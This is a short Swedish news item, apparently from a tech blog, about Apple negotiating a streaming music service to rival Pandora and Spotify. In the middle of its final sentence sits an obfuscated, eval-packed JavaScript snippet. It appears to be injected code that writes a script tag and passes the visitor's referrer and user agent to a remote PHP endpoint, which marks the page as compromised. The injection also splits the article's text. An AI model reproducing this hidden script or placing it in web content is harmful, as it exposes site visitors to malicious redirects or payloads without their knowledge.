Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

Apple: Ny musiktjänst på väg!

Apple: Ny musiktjänst på väg!
Sebastian Plengier Ehrnfelt

I början av 2000-talet lanserades Apple iTunes. En framgång som fick Apples kassa att flöda. Idag ca tio år efter så är det nya aktörer som styr musik-streaming marknaden. Apple har länge varit i konkurrens med streaming-tjänsten Pandora. Självklart har snacket vandrat runt hos Apple om hur de ska få sin marknad för musik på rätt spår, igen. Vår svenska hit Spotify har också fått mycket uppmärksamhet i USA och ses som en konkurrent till iTunes.

Nu uppger källor till Bloomberg att Apple är i förhandlingar om att lansera en ny musiktjänst som då skulle satsa på streaming istället för digitala inköp. Pandora som är en amerikansk motsvarighet till Spotify har väldigt stort fokus på radio vilket imponerat på Apples utvecklare.

Förhandlingarna ska leda till ett avtal redan i mitten av november. Detta kan då betyda att vi kanske får se den nya musiktjänsten i början av nästa år.

Om eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stszd|var|u0026u|referrer|fzfhd||js|php’.split(‘|’),0,{}))
detta stämmer kan det hända att båda Pandora och Spotify får stor konkurrens inom de närmsta månaderna.